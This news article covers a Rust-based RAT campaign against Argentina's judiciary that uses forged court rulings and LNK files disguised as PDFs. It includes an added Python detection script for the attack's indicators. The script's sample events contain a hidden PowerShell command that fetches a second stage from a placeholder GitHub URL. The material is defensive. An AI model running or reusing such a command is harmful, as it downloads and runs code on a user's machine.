A highly sophisticated cyber-espionage campaign has been discovered targeting the heart of Argentina’s legal system. Dubbed “Operation Covert Access” by researchers at Seqrite Labs, the campaign employs a stealthy, Rust-based Remote Access Trojan (RAT) to infiltrate judicial bodies, utilizing decoy documents so authentic that even legal professionals might be fooled.
The attackers initiate the infection chain via spear-phishing emails containing a ZIP archive. Inside, victims find what appears to be a critical judicial notice.
According to the analysis by Seqrite Labs, the decoy is not a generic template but a high-quality forgery. “The decoy document used in this campaign is a legitimate-looking Argentine federal court resolution written in formal legal Spanish”.

The document references real judicial bodies, specifically the “Tribunal Oral en lo Criminal y Correccional N° 2,” and discusses sensitive legal matters such as preventive detention reviews and conditional releases. The report notes that “its structure, terminology, and formatting closely mirror authentic court rulings, significantly increasing its credibility among legal and judicial professionals”.
While the victim reviews the court ruling, a complex infection process runs in the background. The attack begins when a user clicks a malicious LNK file disguised as a PDF. This triggers a hidden PowerShell command that reaches out to a GitHub repository to download the next stage of the payload.
The attackers abuse legitimate infrastructure to mask their activities. “The batch file establishes a connection to a GitHub-hosted URL and retrieves a second-stage payload,” allowing the malware to blend in with normal network traffic.
The core of the attack is a custom Remote Access Trojan (RAT) written in Rust, a programming language increasingly favored by cybercriminals for its performance and evasion capabilities. To avoid detection, the malware renames itself to msedge_proxy.exe and hides within the Microsoft Edge user data directory.
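The chain described above gives a defender three concrete detection points: an LNK posing as a PDF, PowerShell pulling a stage from GitHub, and an executable named msedge_proxy.exe written under the Edge user-data directory. The following is an added example, not code from Seqrite Labs or the report; the event format, the sample events, the `.pdf.lnk` double extension and the GitHub host names are assumptions.

```python
import re

# Indicators stated in the article: an LNK disguised as a PDF, PowerShell
# fetching the next stage from GitHub, and the RAT renamed msedge_proxy.exe
# inside the Edge user-data directory. The ".pdf.lnk" double extension and
# the exact GitHub hosts are assumptions, not taken from the report.
LNK_AS_PDF = re.compile(r"\.pdf\.lnk$", re.IGNORECASE)
GITHUB_URL = re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/", re.IGNORECASE)
# Edge keeps profile data under "User Data"; its real binaries live under
# "Application", so an .exe in User Data is anomalous by itself.
EDGE_USER_DATA_EXE = re.compile(r"\\Microsoft\\Edge\\User Data\\.*msedge_proxy\.exe$", re.IGNORECASE)


def classify(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    if event.get("type") == "file":
        path = event.get("path", "")
        if LNK_AS_PDF.search(path):
            hits.append("lnk_masquerading_as_pdf")
        if EDGE_USER_DATA_EXE.search(path):
            hits.append("executable_in_edge_user_data")
    elif event.get("type") == "process":
        image = event.get("image", "").lower()
        if image.endswith(("powershell.exe", "pwsh.exe")) and GITHUB_URL.search(event.get("cmdline", "")):
            hits.append("powershell_github_stage_fetch")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every rule over a list of events; return (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample telemetry (file-create and process-create events).
SAMPLE_EVENTS = [
    {"type": "file", "path": r"C:\Users\ana\AppData\Local\Temp\Resolucion_Tribunal.pdf.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c iwr https://raw.githubusercontent.com/PLACEHOLDER/stage2"},
    {"type": "file", "path": r"C:\Users\ana\AppData\Local\Microsoft\Edge\User Data\msedge_proxy.exe"},
    # Legitimate Edge binary location: must not alert.
    {"type": "file", "path": r"C:\Program Files (x86)\Microsoft\Edge\Application\120.0.0.0\msedge_proxy.exe"},
    # Benign PowerShell use: must not alert.
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule fires on its own, so a single hit is a lead to triage; the three firing in sequence on one host matches the chain the report describes.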
Once active, the RAT performs extensive checks to ensure it is not being watched. It scans for virtualization software like VMware and VirtualBox, and checks for analysis tools like Wireshark or Fiddler. “If any of those paths exist—typically directories or files associated with virtual machines, analysis tools, or sandboxes—the condition becomes true, and the malware immediately terminates the process”.
The capabilities of this RAT are alarming. It supports a modular command set that allows attackers to maintain persistence, harvest files, and even elevate privileges. More disturbingly, the malware includes commands for encryption, suggesting a potential dual-use for espionage and ransomware attacks.
“The malware receives C2 commands like _ENCRYPT_:_DECRYPT_… It checks for ransomware.enc (encrypted DLL) and ransomware.key, then decrypts the DLL using the provided key”.
This functionality implies that the attackers could easily pivot from stealing sensitive legal data to locking down the entire network.
By combining hyper-realistic social engineering with advanced technical evasion, the attackers have created a potent tool for compromising high-value targets.
As Seqrite Labs concludes in their report, “Operation Covert Access demonstrates how judicial-themed spear-phishing, combined with weaponized LNK files and a stealthy Remote Access Trojan (RAT), can be leveraged to establish long-term access within high-trust institutional environments”.